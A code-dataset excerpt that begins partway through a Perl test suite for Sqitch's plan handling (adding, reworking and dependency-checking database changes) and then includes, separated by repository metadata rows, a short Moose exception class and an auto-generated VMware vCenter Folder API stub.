is $plan->last->name, 'jive', 'Last change should be "jive"';
is_deeply [ map { $_->change } $new_change->requires ], ['blow'],
'Should have dependency "blow"';
is $new_change->as_string,
'jive [blow] ' . $new_change->timestamp->as_string . ' '
. $new_change->format_planner,
'Should have nice stringification of "jive [blow]"';
is [$plan->lines]->[-1], $new_change,
'The new change should have been appended to the lines, too';
# Make sure externals and conflicts are unique.
ok $new_change = $plan->add(
name => 'moo',
requires => [qw(ext:foo ext:foo)],
conflicts => [qw(blow blow ext:whu ext:whu)],
), 'Add change "moo" with dupe dependencies';
is $plan->count, 8, 'Should have 8 changes';
ok $plan->contains('moo'), 'Should find "moo" in plan';
is $plan->index_of('moo'), 7, 'Should find "moo" at index 7';
is $plan->last->name, 'moo', 'Last change should be "moo"';
is_deeply [ map { $_->as_string } $new_change->requires ], ['ext:foo'],
    'Should require "ext:foo"';
is_deeply [ map { $_->as_string } $new_change->conflicts ], [qw(blow ext:whu)],
'Should conflict with "blow" and "ext:whu"';
is $new_change->as_string,
'moo [ext:foo !blow !ext:whu] ' . $new_change->timestamp->as_string . ' '
. $new_change->format_planner,
'Should have nice stringification of "moo [ext:foo !blow !ext:whu]"';
is [$plan->lines]->[-1], $new_change,
'The new change should have been appended to the lines, too';
# Should choke on a duplicate change.
throws_ok { $plan->add(name => 'blow') } 'App::Sqitch::X',
'Should get error trying to add duplicate change';
is $@->ident, 'plan', 'Duplicate change error ident should be "plan"';
is $@->message, __x(
qq{Change "{change}" already exists in plan {file}.\nUse "sqitch rework" to copy and rework it},
change => 'blow',
file => $plan->file,
), 'And the error message should suggest "rework"';
# Should choke on an invalid change names.
for my $name (@bad_names) {
throws_ok { $plan->add( name => $name ) } 'App::Sqitch::X',
qq{Should get error for invalid change "$name"};
is $@->ident, 'plan', qq{Invalid name "$name" error ident should be "plan"};
is $@->message, __x(
qq{"{name}" is invalid: changes must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
name => $name,
), qq{And the "$name" error message should be correct};
}
# Try a reserved name.
for my $reserved (qw(HEAD ROOT)) {
throws_ok { $plan->add( name => $reserved ) } 'App::Sqitch::X',
qq{Should get error for reserved name "$reserved"};
is $@->ident, 'plan', qq{Reserved name "$reserved" error ident should be "plan"};
is $@->message, __x(
'"{name}" is a reserved name',
name => $reserved,
), qq{And the reserved name "$reserved" message should be correct};
}
# Try an unknown dependency.
throws_ok { $plan->add( name => 'whu', requires => ['nonesuch' ] ) } 'App::Sqitch::X',
'Should get failure for failed dependency';
is $@->ident, 'plan', 'Dependency error ident should be "plan"';
is $@->message, __x(
'Cannot add change "{change}": requires unknown change "{req}"',
change => 'whu',
req => 'nonesuch',
), 'The dependency error should be correct';
# Try invalid dependencies.
throws_ok { $plan->add( name => 'whu', requires => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid dependency';
is $@->ident, 'plan', 'Invalid dependency error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid dependency error should be correct';
throws_ok { $plan->add( name => 'whu', conflicts => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid conflict';
is $@->ident, 'plan', 'Invalid conflict error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid conflict error should be correct';
# Should choke on an unknown tag, too.
throws_ok { $plan->add(name => 'whu', requires => ['@nonesuch' ] ) } 'App::Sqitch::X',
'Should get failure for failed tag dependency';
is $@->ident, 'plan', 'Tag dependency error ident should be "plan"';
is $@->message, __x(
'Cannot add change "{change}": requires unknown change "{req}"',
change => 'whu',
req => '@nonesuch',
), 'The tag dependency error should be correct';
# Should choke on a change that looks like a SHA1.
throws_ok { $plan->add(name => $sha1) } 'App::Sqitch::X',
'Should get error for a SHA1 change';
is $@->ident, 'plan', 'SHA1 tag error ident should be "plan"';
is $@->message, __x(
'"{name}" is invalid because it could be confused with a SHA1 ID',
    name => $sha1,
), 'And the reserved name error should be output';
##############################################################################
# Try reworking a change.
can_ok $plan, 'rework';
ok my $rev_change = $plan->rework( name => 'you' ), 'Rework change "you"';
isa_ok $rev_change, 'App::Sqitch::Plan::Change';
is $rev_change->name, 'you', 'Reworked change should be "you"';
ok my $orig = $plan->change_at($plan->first_index_of('you')),
'Get original "you" change';
is $orig->name, 'you', 'It should also be named "you"';
is_deeply [ map { $_->format_name } $orig->rework_tags ],
[qw(@bar)], 'And it should have the one rework tag';
is $orig->deploy_file, $target->deploy_dir->file('you@bar.sql'),
'The original file should now be named you@bar.sql';
is $rev_change->as_string,
'you [you@bar] ' . $rev_change->timestamp->as_string . ' '
. $rev_change->format_planner,
'It should require the previous "you" change';
is [$plan->lines]->[-1], $rev_change,
'The new "you" should have been appended to the lines, too';
# Make sure it was appended to the plan.
ok $plan->contains('you@HEAD'), 'Should find "you@HEAD" in plan';
is $plan->index_of('you@HEAD'), 8, 'It should be at position 8';
is $plan->count, 9, 'The plan count should be 9';
# Tag and add again, to be sure we can do it multiple times.
ok $plan->tag( name => '@beta1' ), 'Tag @beta1';
ok my $rev_change2 = $plan->rework( name => 'you' ),
'Rework change "you" again';
isa_ok $rev_change2, 'App::Sqitch::Plan::Change';
is $rev_change2->name, 'you', 'New reworked change should be "you"';
ok $orig = $plan->change_at($plan->first_index_of('you')),
'Get original "you" change again';
is $orig->name, 'you', 'It should still be named "you"';
is_deeply [ map { $_->format_name } $orig->rework_tags ],
[qw(@bar)], 'And it should have the one rework tag';
ok $rev_change = $plan->get('you@beta1'), 'Get you@beta1';
is $rev_change->name, 'you', 'The second "you" should be named that';
is_deeply [ map { $_->format_name } $rev_change->rework_tags ],
[qw(@beta1)], 'And the second change should have the rework_tag "@beta1"';
is_deeply [ $rev_change2->rework_tags ],
[], 'But the new reworked change should have no rework tags';
is $rev_change2->as_string,
'you [you@beta1] ' . $rev_change2->timestamp->as_string . ' '
. $rev_change2->format_planner,
'It should require the previous "you" change';
is [$plan->lines]->[-1], $rev_change2,
'The new reworking should have been appended to the lines';
# Make sure it was appended to the plan.
ok $plan->contains('you@HEAD'), 'Should find "you@HEAD" in plan';
is $plan->index_of('you@HEAD'), 9, 'It should be at position 9';
is $plan->count, 10, 'The plan count should be 10';
# Try a nonexistent change name.
throws_ok { $plan->rework( name => 'nonexistent' ) } 'App::Sqitch::X',
'rework should die on nonexistent change';
is $@->ident, 'plan', 'Nonexistent change error ident should be "plan"';
is $@->message, __x(
qq{Change "{change}" does not exist in {file}.\nUse "sqitch add {change}" to add it to the plan},
change => 'nonexistent',
file => $plan->file,
), 'And the error should suggest "sqitch add"';
# Try reworking without an intervening tag.
throws_ok { $plan->rework( name => 'you' ) } 'App::Sqitch::X',
    'rework should die on lack of intervening tag';
is $@->ident, 'plan', 'Missing tag error ident should be "plan"';
is $@->message, __x(
qq{Cannot rework "{change}" without an intervening tag.\nUse "sqitch tag" to create a tag and try again},
change => 'you',
), 'And the error should suggest "sqitch tag"';
# Make sure it checks dependencies.
throws_ok { $plan->rework( name => 'booyah', requires => ['nonesuch' ] ) }
'App::Sqitch::X',
'rework should die on failed dependency';
is $@->ident, 'plan', 'Rework dependency error ident should be "plan"';
is $@->message, __x(
'Cannot rework change "{change}": requires unknown change "{req}"',
change => 'booyah',
req => 'nonesuch',
), 'The rework dependency error should be correct';
# Try invalid dependencies.
throws_ok { $plan->rework( name => 'booyah', requires => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid dependency';
is $@->ident, 'plan', 'Invalid dependency error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid dependency error should be correct';
throws_ok { $plan->rework( name => 'booyah', conflicts => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid conflict';
is $@->ident, 'plan', 'Invalid conflict error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid conflict error should be correct';
##############################################################################
# Try a plan with a duplicate change in different tag sections.
$file = file qw(t plans dupe-change-diff-tag.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
    $CLASS, 'Plan should work with dupe change across tags';
is $plan->file, $target->plan_file, 'File should be copied from Sqitch';
is $plan->project, 'dupe_change_diff_tag', 'Project name should be set';
cmp_deeply [ $plan->lines ], [
clear,
version,
prag( '', '', 'project', '', '=', '', 'dupe_change_diff_tag'),
blank,
change { name => 'whatever' },
tag { name => 'foo', ret => 1 },
blank(),
change { name => 'hi' },
tag { name => 'bar', ret => 1 },
blank(),
change { name => 'greets' },
change { name => 'whatever', rtag => [qw(hi whatever)] },
], 'Lines with dupe change should be read from file';
$vivify = 1;
cmp_deeply [ $plan->changes ], [
clear,
change { name => 'whatever' },
tag { name => 'foo' },
change { name => 'hi' },
tag { name => 'bar' },
change { name => 'greets' },
change { name => 'whatever', rtag => [qw(hi whatever)] },
], 'Changes with dupe change should be read from file';
is sorted, 3, 'Should have sorted changes three times';
# Try to find whatever.
ok $plan->contains('whatever'), 'Should find "whatever" in plan';
throws_ok { $plan->index_of('whatever') } 'App::Sqitch::X',
'Should get an error trying to find dupe key.';
is $@->ident, 'plan', 'Dupe key error ident should be "plan"';
is $@->message, __ 'Change lookup failed',
'Dupe key error message should be correct';
is_deeply +MockOutput->get_vent, [
[__x(
'Change "{change}" is ambiguous. Please specify a tag-qualified change:',
change => 'whatever',
)],
[ ' * ', 'whatever@HEAD' ],
[ ' * ', 'whatever@foo' ],
], 'Should have output listing tag-qualified changes';
is $plan->index_of('whatever@HEAD'), 3, 'Should get 3 for whatever@HEAD';
is $plan->index_of('whatever@bar'), 0, 'Should get 0 for whatever@bar';
# Make sure seek works, too.
throws_ok { $plan->seek('whatever') } 'App::Sqitch::X',
'Should get an error seeking dupe key.';
is $@->ident, 'plan', 'Dupe key error ident should be "plan"';
is $@->message, __ 'Change lookup failed',
'Dupe key error message should be correct';
is_deeply +MockOutput->get_vent, [
[__x(
'Change "{change}" is ambiguous. Please specify a tag-qualified change:',
change => 'whatever',
)],
[ ' * ', 'whatever@HEAD' ],
[ ' * ', 'whatever@foo' ],
], 'Should have output listing tag-qualified changes';
is $plan->index_of('whatever@HEAD'), 3, 'Should find whatever@HEAD at index 3';
is $plan->index_of('whatever@bar'), 0, 'Should find whatever@bar at index 0';
is $plan->first_index_of('whatever'), 0,
'Should find first instance of whatever at index 0';
is $plan->first_index_of('whatever', '@bar'), 3,
    'Should find first instance of whatever after @bar at index 3';
ok $plan->seek('whatever@HEAD'), 'Seek whatever@HEAD';
is $plan->position, 3, 'Position should be 3';
ok $plan->seek('whatever@bar'), 'Seek whatever@bar';
is $plan->position, 0, 'Position should be 0';
is $plan->last_tagged_change->name, 'hi', 'Last tagged change should be "hi"';
##############################################################################
# Test open_script.
make_path dir(qw(sql deploy stuff))->stringify;
END { remove_tree 'sql' };
can_ok $CLASS, 'open_script';
my $change_file = file qw(sql deploy bar.sql);
$fh = $change_file->open('>') or die "Cannot open $change_file: $!\n";
$fh->say('-- This is a comment');
$fh->close;
ok $fh = $plan->open_script($change_file), 'Open bar.sql';
is $fh->getline, "-- This is a comment\n", 'It should be the right file';
$fh->close;
file(qw(sql deploy baz.sql))->touch;
ok $fh = $plan->open_script(file qw(sql deploy baz.sql)), 'Open baz.sql';
is $fh->getline, undef, 'It should be empty';
# Make sure it dies on an invalid file.
throws_ok { $plan->open_script(file 'nonexistent' ) } 'App::Sqitch::X',
'open_script() should die on nonexistent file';
is $@->ident, 'io', 'Nonexistent file error ident should be "io"';
is $@->message, __x(
'Cannot open {file}: {error}',
file => 'nonexistent',
error => $! || 'No such file or directory',
), 'Nonexistent file error message should be correct';
##############################################################################
# Test check_changes()
$mocker->unmock('check_changes');
can_ok $CLASS, 'check_changes';
my @deps;
my $i = 0;
my $j = 0;
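# Mock requires() to hand out canned dependencies from @deps: calls made from
# inside App::Sqitch::Plan advance the $i cursor, calls from the test advance $j.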
$mock_change->mock(requires => sub {
my $reqs = caller eq 'App::Sqitch::Plan' ? $deps[$i++] : $deps[$j++];
@{ $reqs->{requires} };
});
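# Helper for the dependency tests: calls clear(), resets both cursors, and
# returns a change for each name passed in.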
sub changes {
clear;
$i = $j = 0;
map {
change { name => $_ };
} @_;
}
# Start with no dependencies.
$project = 'foo';
my %ddep = ( requires => [], conflicts => [] );
@deps = ({%ddep}, {%ddep}, {%ddep});
cmp_deeply [map { $_->name } $plan->check_changes({}, changes qw(this that other))],
[qw(this that other)], 'Should get original order when no dependencies';
@deps = ({%ddep}, {%ddep}, {%ddep});
cmp_deeply [map { $_->name } $plan->check_changes('foo', changes qw(this that other))],
[qw(this that other)], 'Should get original order when no prepreqs';
# Have that require this.
@deps = ({%ddep}, {%ddep, requires => [dep 'this']}, {%ddep});
cmp_deeply [map { $_->name }$plan->check_changes('foo', changes qw(this that other))],
[qw(this that other)], 'Should get original order when that requires this';
# Have other require that.
@deps = ({%ddep}, {%ddep, requires => [dep 'this']}, {%ddep, requires => [dep 'that']});
cmp_deeply [map { $_->name } $plan->check_changes('foo', changes qw(this that other))],
[qw(this that other)], 'Should get original order when other requires that';
my $deperr = sub {
join "\n ", __n(
'Dependency error detected:',
'Dependency errors detected:',
@_
), @_
};
# Have this require other.
@deps = ({%ddep, requires => [dep 'other']}, {%ddep}, {%ddep});
throws_ok {
$plan->check_changes('foo', changes qw(this that other))
} 'App::Sqitch::X', 'Should get error for out-of-order dependency';
is $@->ident, 'parse', 'Unordered dependency error ident should be "parse"';
is $@->message, $deperr->(__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
2,
change => 'this',
required => 'other',
num => 2,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
2,
change => 'this',
num => 2,
plan => $plan->file,
)), 'And the unordered dependency error message should be correct';
# Have this require other and that.
@deps = ({%ddep, requires => [dep 'other', dep 'that']}, {%ddep}, {%ddep});
throws_ok {
$plan->check_changes('foo', changes qw(this that other));
} 'App::Sqitch::X', 'Should get error for multiple dependency errors';
is $@->ident, 'parse', 'Multiple dependency error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
2,
change => 'this',
required => 'other',
num => 2,
), __nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
2,
change => 'this',
num => 2,
plan => $plan->file,
),
), 'And the multiple dependency error message should be correct';
# Have that require a tag.
@deps = ({%ddep}, {%ddep, requires => [dep '@howdy']}, {%ddep});
cmp_deeply [$plan->check_changes('foo', {'@howdy' => 2 }, changes qw(this that other))],
[changes qw(this that other)], 'Should get original order when requiring a tag';
# Requires a step as of a tag.
@deps = ({%ddep}, {%ddep, requires => [dep 'foo@howdy']}, {%ddep});
cmp_deeply [$plan->check_changes('foo', {'foo' => 1, '@howdy' => 2 }, changes qw(this that other))],
[changes qw(this that other)],
'Should get original order when requiring a step as-of a tag';
# Should die if the step comes *after* the specified tag.
@deps = ({%ddep}, {%ddep, requires => [dep 'foo@howdy']}, {%ddep});
throws_ok { $plan->check_changes('foo', {'foo' => 3, '@howdy' => 2 }, changes qw(this that other)) }
'App::Sqitch::X', 'Should get failure for a step after a tag';
is $@->ident, 'parse', 'Step after tag error ident should be "parse"';
is $@->message, $deperr->(__x(
'Unknown change "{required}" required by change "{change}"',
required => 'foo@howdy',
change => 'that',
)), 'And the unknown change as-of a tag message should be correct';
# Add a cycle.
@deps = ({%ddep, requires => [dep 'that']}, {%ddep, requires => [dep 'this']}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should get failure for a cycle';
is $@->ident, 'parse', 'Cycle error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
1,
change => 'this',
num => 1,
plan => $plan->file,
),
), 'The cycle error message should be correct';
# Add an extended cycle.
@deps = (
{%ddep, requires => [dep 'that']},
{%ddep, requires => [dep 'other']},
{%ddep, requires => [dep 'this']}
);
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should get failure for a two-hop cycle';
is $@->ident, 'parse', 'Two-hop cycle error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
1,
change => 'this',
num => 1,
plan => $plan->file,
), __nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'that',
required => 'other',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
1,
change => 'that',
num => 1,
plan => $plan->file,
),
), 'The two-hop cycle error message should be correct';
# Okay, now deal with dependencies from earlier change sections.
@deps = ({%ddep, requires => [dep 'foo']}, {%ddep}, {%ddep});
cmp_deeply [$plan->check_changes('foo', { foo => 1}, changes qw(this that other))],
[changes qw(this that other)], 'Should get original order with earlier dependency';
# Mix it up.
@deps = ({%ddep, requires => [dep 'other', dep 'that']}, {%ddep, requires => [dep 'sqitch']}, {%ddep});
throws_ok {
$plan->check_changes('foo', {sqitch => 1 }, changes qw(this that other))
} 'App::Sqitch::X', 'Should get error with misordered and seen dependencies';
is $@->ident, 'parse', 'Misordered and seen error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
2,
change => 'this',
required => 'other',
num => 2,
), __nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
2,
change => 'this',
num => 2,
plan => $plan->file,
),
), 'And the misordered and seen error message should be correct';
# Make sure it fails on unknown previous dependencies.
@deps = ({%ddep, requires => [dep 'foo']}, {%ddep}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should die on unknown dependency';
is $@->ident, 'parse', 'Unknown dependency error ident should be "parse"';
is $@->message, $deperr->(__x(
'Unknown change "{required}" required by change "{change}"',
required => 'foo',
change => 'this',
)), 'And the error should point to the offending change';
# Make sure it fails on an unknown tag dependency, too.
@deps = ({%ddep, requires => [dep '@foo']}, {%ddep}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should die on unknown tag dependency';
is $@->ident, 'parse', 'Unknown tag dependency error ident should be "parse"';
is $@->message, $deperr->(__x(
'Unknown change "{required}" required by change "{change}"',
required => '@foo',
change => 'this',
)), 'And the error should point to the offending change';
# Allow dependencies from different projects.
@deps = ({%ddep}, {%ddep, requires => [dep 'bar:bob']}, {%ddep});
cmp_deeply [$plan->check_changes('foo', changes qw(this that other))],
[changes qw(this that other)], 'Should get original order with external dependency';
$project = undef;
# Make sure that a change does not require itself
@deps = ({%ddep, requires => [dep 'this']}, {%ddep}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should die on self dependency';
is $@->ident, 'parse', 'Self dependency error ident should be "parse"';
is $@->message, $deperr->(__x(
'Change "{change}" cannot require itself',
change => 'this',
)), 'And the self dependency error should be correct';
# Make sure sort ordering respects the original ordering.
@deps = (
{%ddep},
{%ddep},
{%ddep, requires => [dep 'that']},
{%ddep, requires => [dep 'that', dep 'this']},
);
cmp_deeply [$plan->check_changes('foo', changes qw(this that other thing))],
[changes qw(this that other thing)],
'Should get original order with cascading dependencies';
$project = undef;
@deps = (
{%ddep},
{%ddep},
{%ddep, requires => [dep 'that']},
{%ddep, requires => [dep 'that', dep 'this', dep 'other']},
{%ddep, requires => [dep 'that', dep 'this']},
);
cmp_deeply [$plan->check_changes('foo', changes qw(this that other thing yowza))],
[changes qw(this that other thing yowza)],
'Should get original order with multiple cascading dependencies';
$project = undef;
##############################################################################
# Test dependency testing.
can_ok $plan, '_check_dependencies';
$mock_change->unmock('requires');
for my $req (qw(hi greets whatever @foo whatever@foo ext:larry ext:greets)) {
$change = App::Sqitch::Plan::Change->new(
plan => $plan,
name => 'lazy',
requires => [dep $req],
);
my $req_proj = $req =~ /:/ ? do {
(my $p = $req) =~ s/:.+//;
$p;
} : $plan->project;
my ($dep) = $change->requires;
is $dep->project, $req_proj,
        qq{Dependency "$req" should be in project "$req_proj"};
ok $plan->_check_dependencies($change, 'add'),
qq{Dependency on "$req" should succeed};
}
for my $req (qw(wanker @blah greets@foo)) {
$change = App::Sqitch::Plan::Change->new(
plan => $plan,
name => 'lazy',
requires => [dep $req],
);
throws_ok { $plan->_check_dependencies($change, 'bark') } 'App::Sqitch::X',
qq{Should get error trying to depend on "$req"};
    is $@->ident, 'plan', qq{Dependency "$req" error ident should be "plan"};
is $@->message, __x(
'Cannot rework change "{change}": requires unknown change "{req}"',
change => 'lazy',
req => $req,
), qq{And should get unknown dependency message for "$req"};
}
##############################################################################
# Test pragma accessors.
is $plan->uri, undef, 'Should have undef URI when no pragma';
$file = file qw(t plans pragmas.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
$CLASS, 'Plan with sqitch with plan file with dependencies';
is $plan->file, $target->plan_file, 'File should be copied from Sqitch';
is $plan->syntax_version, App::Sqitch::Plan::SYNTAX_VERSION,
'syntax_version should be set';
is $plan->project, 'pragmata', 'Project should be set';
is $plan->uri, URI->new('https://github.com/sqitchers/sqitch/'),
'Should have URI from pragma';
isa_ok $plan->uri, 'URI', 'It';
# Make sure we get an error if there is no project pragma.
$fh = IO::File->new(\"%strict\n\nfoo $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse('noproject', $fh) } 'App::Sqitch::X',
'Should die on plan with no project pragma';
is $@->ident, 'parse', 'Missing project error ident should be "parse"';
is $@->message, __x('Missing %project pragma in {file}', file => 'noproject'),
'The missing project error message should be correct';
# Make sure we get an error for an invalid project name.
for my $bad (@bad_names) {
my $fh = IO::File->new(\"%project=$bad\n\nfoo $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse(badproj => $fh) } 'App::Sqitch::X',
qq{Should die on invalid project name "$bad"};
is $@->ident, 'parse', qq{Ident for bad proj "$bad" should be "parse"};
my $error = __x(
'invalid project name "{project}": project names must not '
. 'begin with punctuation, contain "@", ":", "#", or blanks, or end in '
. 'punctuation or digits following punctuation',
project => $bad);
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'badproj',
lineno => 1,
error => $error
), qq{Error message for bad project "$bad" should be correct};
}
done_testing;
| 39.4 | 109 | 0.581973 |
ed9fd378076d7e1229a349da665d526d4cda3220 | 323 | pm | Perl | lib/Moose/Exception/OverloadRequiresNamesForCoderef.pm | mjemmeson/Moose | 500a1f3331d4a7187775f4b82cdc4f1af2e232d6 | [
"Artistic-1.0"
] | null | null | null | lib/Moose/Exception/OverloadRequiresNamesForCoderef.pm | mjemmeson/Moose | 500a1f3331d4a7187775f4b82cdc4f1af2e232d6 | [
"Artistic-1.0"
] | null | null | null | lib/Moose/Exception/OverloadRequiresNamesForCoderef.pm | mjemmeson/Moose | 500a1f3331d4a7187775f4b82cdc4f1af2e232d6 | [
"Artistic-1.0"
] | null | null | null | package Moose::Exception::OverloadRequiresNamesForCoderef;
our $VERSION = '2.1803';
use Moose;
extends 'Moose::Exception';
sub _build_message {
my $self = shift;
'If you provide a coderef parameter to the Moose::Meta::Overload constructor you must also provide coderef_package and coderef_name parameters';
}
1;
| 24.846154 | 148 | 0.758514 |
ed6b3c5e408d4126461c5a5deaed4fa991b11e06 | 4,315 | pm | Perl | lib/sdk/Com/Vmware/Vcenter/FolderStub.pm | bince-criticalcase/vsphere-automation-sdk-perl | da3330bf66dc6c853e9a23062146d54afc299955 | [
"MIT"
] | 26 | 2017-04-24T19:20:08.000Z | 2021-12-06T23:15:09.000Z | lib/sdk/Com/Vmware/Vcenter/FolderStub.pm | bince-criticalcase/vsphere-automation-sdk-perl | da3330bf66dc6c853e9a23062146d54afc299955 | [
"MIT"
] | 7 | 2017-05-25T04:49:56.000Z | 2020-10-12T09:13:16.000Z | lib/sdk/Com/Vmware/Vcenter/FolderStub.pm | DamonLiang2021/vsphere-automation-sdk-perl | da3330bf66dc6c853e9a23062146d54afc299955 | [
"MIT"
] | 11 | 2017-05-05T11:52:12.000Z | 2021-12-06T23:14:59.000Z | ########################################################################
# Copyright (C) 2013 - 2014 VMware, Inc.
########################################################################
## @file FolderStub.pm
# Auto generated vAPI skeleton file.
# DO NOT MODIFY!
#
#
#use Com::Vmware::Vapi::Std::Errors;
package Com::Vmware::Vcenter::FolderStub;
## @class Com::Vmware::Vcenter::Folder
#
#The {@term Folder} {@term service} provides {@term operations} for
#manipulating a vCenter Server folder.
#
#
# Core Perl modules
#
use strict;
use warnings;
use Carp;
#
# Vapi Perl modules
#
use Com::Vmware::Vapi::Bindings::Type::BlobType;
use Com::Vmware::Vapi::Bindings::Type::BooleanType;
use Com::Vmware::Vapi::Bindings::Type::DateTimeType;
use Com::Vmware::Vapi::Bindings::Type::DoubleType;
use Com::Vmware::Vapi::Bindings::Type::EnumType;
use Com::Vmware::Vapi::Bindings::Type::ErrorType;
use Com::Vmware::Vapi::Bindings::Type::ListType;
use Com::Vmware::Vapi::Bindings::Type::LongType;
use Com::Vmware::Vapi::Bindings::Type::MapType;
use Com::Vmware::Vapi::Bindings::Type::OpaqueType;
use Com::Vmware::Vapi::Bindings::Type::OptionalType;
use Com::Vmware::Vapi::Bindings::Type::ReferenceType;
use Com::Vmware::Vapi::Bindings::Type::SecretType;
use Com::Vmware::Vapi::Bindings::Type::SetType;
use Com::Vmware::Vapi::Bindings::Type::StringType;
use Com::Vmware::Vapi::Bindings::Type::StructType;
use Com::Vmware::Vapi::Bindings::Type::DynamicStructType;
use Com::Vmware::Vapi::Bindings::Type::URIType;
use Com::Vmware::Vapi::Bindings::Type::VoidType;
use Com::Vmware::Vapi::Data::UnionValidator;
#
# Base class
#
use base qw(Com::Vmware::Vapi::Bindings::ApiInterfaceStub);
## @method new
# Constructor to initialize the object
#
# @param ApiProvider - ApiProvider for vAPI stubs
#
# @return
# Blessed object
#
sub new
{
my ($class, %args) = @_;
my $api_provider = $args {api_provider};
$class = ref($class) || $class;
#
# properties for list operation
#
my $list_input_type = new Com::Vmware::Vapi::Bindings::Type::StructType(
'name' => 'operation-input',
'fields' => {
'filter' => new Com::Vmware::Vapi::Bindings::Type::OptionalType('element_type' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vcenter', 'type_name' => 'Folder::FilterSpec')),
}
);
my $list_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'InvalidArgument'),
'com.vmware.vapi.std.errors.unable_to_allocate_resource' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'UnableToAllocateResource'),
'com.vmware.vapi.std.errors.service_unavailable' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.unauthenticated' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'Unauthenticated'),
'com.vmware.vapi.std.errors.unauthorized' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'Unauthorized'),
};
my $list_input_validator_list = [
];
my $list_output_validator_list = [];
#
# All the methods (operations) info in a hash
#
my $operations = {
'list' => {
'input_type'=> $list_input_type,
'output_type'=> new Com::Vmware::Vapi::Bindings::Type::ListType(new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vcenter', 'type_name' => 'Folder::Summary')),
'errors'=> $list_error_dict,
'input_validator_list'=> $list_input_validator_list,
'output_validator_list'=> $list_output_validator_list,
},
};
my $self = $class->SUPER::new ('api_provider' => $api_provider,
'iface_name' => 'com.vmware.vcenter.folder',
'operations' => $operations
);
bless $self, $class;
return $self;
}
1;
| 37.850877 | 232 | 0.635226 |
ed82f8fb10f63c07c8fd4c7f668c95597310ac7a | 38,744 | pl | Perl | mr.4r.pl | batereck/lacak-orang | 2534950c41ad90ee23ca63c4aa82943b6907ed2a | [
"MIT"
] | null | null | null | mr.4r.pl | batereck/lacak-orang | 2534950c41ad90ee23ca63c4aa82943b6907ed2a | [
"MIT"
